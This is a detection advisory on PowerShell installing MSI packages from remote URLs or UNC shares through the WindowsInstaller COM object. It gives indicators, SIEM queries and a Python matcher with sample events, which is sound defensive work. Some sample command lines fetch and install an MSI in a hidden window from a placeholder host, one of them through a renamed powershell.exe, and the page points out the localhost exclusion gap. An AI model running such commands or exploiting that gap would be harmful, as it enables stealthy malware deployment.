Date: 06/26/2025
Severity: Medium
Summary
PowerShell MSI Install Via WindowsInstaller COM From Remote Location covers the use of PowerShell to install an MSI package through the WindowsInstaller.Installer COM object (New-Object -ComObject WindowsInstaller.Installer, followed by a call to its InstallProduct method) where the package path is an http(s) URL or a UNC path rather than a local file. Attackers may use this to deploy malware or stage tooling for lateral movement while evading detections that only watch standard installation methods such as msiexec.exe command lines. Package paths that point at the local host (://127.0.0.1, ://localhost) are excluded from the detection below to limit false positives from local tooling; note that this exclusion also means an MSI served from a listener on the same host will not alert.
Indicators of Compromise (IOC) List
Field | Values |
Image (path ends with) | '\powershell_ise.exe' '\powershell.exe' '\pwsh.exe' |
OriginalFileName | 'PowerShell_ISE.EXE' 'PowerShell.EXE' 'pwsh.dll' |
CommandLine (must contain all of) | '-ComObject' 'InstallProduct(' |
CommandLine (must contain one of) | 'http' '\\\\' |
CommandLine (exclusion, none of) | '://127.0.0.1' '://localhost' |
Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection
Detection Query 1 : | ((resourcename = "Windows Security" AND eventtype = "4688") AND (processname like "PowerShell_ISE.EXE" OR processname like "PowerShell.EXE" OR processname like "pwsh.dll") AND (commandline not like "://127.0.0.1" AND commandline not like "://localhost") AND (commandline like "-ComObject" AND commandline like "InstallProduct(") AND (commandline like "http" OR commandline like "\\\\") ) |
Detection Query 2 : | technologygroup = "EDR" AND (processname like "PowerShell_ISE.EXE" OR processname like "PowerShell.EXE" OR processname like "pwsh.dll") AND (commandline not like "://127.0.0.1" AND commandline not like "://localhost") AND (commandline like "-ComObject" AND commandline like "InstallProduct(") AND (commandline like "http" OR commandline like "\\\\") |
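The selection and exclusion logic from the IOC list and the two queries above, as an added worked example that is not Gurucul's or SigmaHQ's code: a small Python matcher that applies the same conditions to constructed process-creation events (the shape Security 4688 or an EDR sensor would supply). The file paths, host names (example.invalid, fileserver) and PowerShell command lines are assumptions made up for the example; the command lines show the COM call the summary describes, including a renamed powershell.exe that only OriginalFileName still identifies, and a loopback URL that the exclusion suppresses.

```python
"""Added example for this page: the rule's selection/exclusion logic run
over constructed process-creation events.  Not vendor or SigmaHQ code."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Values as listed in the IOC list above.  Sigma 'contains'/'endswith' are
# case-insensitive, so every comparison below lower-cases both sides.
IMAGE_SUFFIXES = ("\\powershell_ise.exe", "\\powershell.exe", "\\pwsh.exe")
ORIGINAL_FILE_NAMES = ("PowerShell_ISE.EXE", "PowerShell.EXE", "pwsh.dll")
CMDLINE_ALL = ("-comobject", "installproduct(")
CMDLINE_ANY = ("http", "\\\\")            # URL scheme, or a UNC prefix "\\"
FILTER_LOCAL = ("://127.0.0.1", "://localhost")


@dataclass
class ProcessEvent:
    image: str               # full path of the new process
    original_file_name: str  # OriginalFileName from the PE version resource
    command_line: str


def is_powershell_host(ev: ProcessEvent) -> bool:
    """Image ends with a PowerShell binary name OR the PE's OriginalFileName
    says it is PowerShell (this second leg catches a renamed powershell.exe)."""
    img = ev.image.lower()
    ofn = ev.original_file_name.lower()
    return img.endswith(IMAGE_SUFFIXES) or ofn in {n.lower() for n in ORIGINAL_FILE_NAMES}


def matches_rule(ev: ProcessEvent) -> bool:
    """PowerShell host AND all of CMDLINE_ALL AND one of CMDLINE_ANY,
    AND none of the loopback/localhost exclusions."""
    cl = ev.command_line.lower()
    if not is_powershell_host(ev):
        return False
    if not all(s in cl for s in CMDLINE_ALL):
        return False
    if not any(s in cl for s in CMDLINE_ANY):
        return False
    if any(s in cl for s in FILTER_LOCAL):
        return False
    return True


_PKG_RE = re.compile(r"InstallProduct\(\s*['\"]([^'\"]+)['\"]", re.IGNORECASE)


def package_source(ev: ProcessEvent) -> Optional[str]:
    """First argument of InstallProduct(): the MSI URL or UNC path, for triage."""
    m = _PKG_RE.search(ev.command_line)
    return m.group(1) if m else None


def detect(events: List[ProcessEvent]) -> List[int]:
    """Indices of the events that fire the rule."""
    return [i for i, ev in enumerate(events) if matches_rule(ev)]


# Constructed sample events (assumed paths and hosts, not real telemetry).
PS_DIR = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\"
SAMPLE_EVENTS = [
    # 0: MSI fetched over HTTP through the Installer COM object -> alert
    ProcessEvent(PS_DIR + "powershell.exe", "PowerShell.EXE",
                 'powershell.exe -nop -w hidden -c "$i = New-Object -ComObject WindowsInstaller.Installer; '
                 "$i.InstallProduct('http://example.invalid/update.msi', 'ACTION=INSTALL')\""),
    # 1: same call from pwsh, package staged on a UNC share -> alert
    ProcessEvent("C:\\Program Files\\PowerShell\\7\\pwsh.exe", "pwsh.dll",
                 'pwsh -c "(New-Object -ComObject WindowsInstaller.Installer).InstallProduct('
                 "'\\\\fileserver\\share\\tool.msi', 'ACTION=INSTALL')\""),
    # 2: loopback web server -> suppressed by the ://localhost exclusion
    ProcessEvent(PS_DIR + "powershell_ise.exe", "PowerShell_ISE.EXE",
                 'powershell_ise.exe -Command "$i = New-Object -ComObject WindowsInstaller.Installer; '
                 "$i.InstallProduct('http://localhost:8080/app.msi', 'ACTION=INSTALL')\""),
    # 3: plain msiexec install from a URL -> not PowerShell, out of scope here
    ProcessEvent("C:\\Windows\\System32\\msiexec.exe", "msiexec.exe",
                 "msiexec.exe /i http://example.invalid/agent.msi /qn"),
    # 4: renamed powershell.exe; only OriginalFileName still says PowerShell -> alert
    ProcessEvent("C:\\Users\\Public\\svchost.exe", "PowerShell.EXE",
                 'svchost.exe -c "$i = New-Object -ComObject WindowsInstaller.Installer; '
                 "$i.InstallProduct('https://example.invalid/p.msi', '')\""),
    # 5: same COM call with a local file path (no http, no UNC) -> no alert
    ProcessEvent(PS_DIR + "powershell.exe", "PowerShell.EXE",
                 'powershell.exe -c "$i = New-Object -ComObject WindowsInstaller.Installer; '
                 "$i.InstallProduct('C:\\Temp\\setup.msi', 'ACTION=INSTALL')\""),
]

if __name__ == "__main__":
    for i in detect(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[i]
        print(f"event {i}: {ev.image} -> package {package_source(ev)}")
```

Events 0, 1 and 4 fire; 2 is suppressed by the loopback exclusion, 3 never enters the PowerShell selection, and 5 has neither an http scheme nor a UNC prefix. Event 4 is the reason the IOC list carries OriginalFileName alongside Image, and event 2 illustrates the gap the exclusion leaves for an MSI served from the same host.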
Reference:
https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_powershell_comobject_msi_remote.yml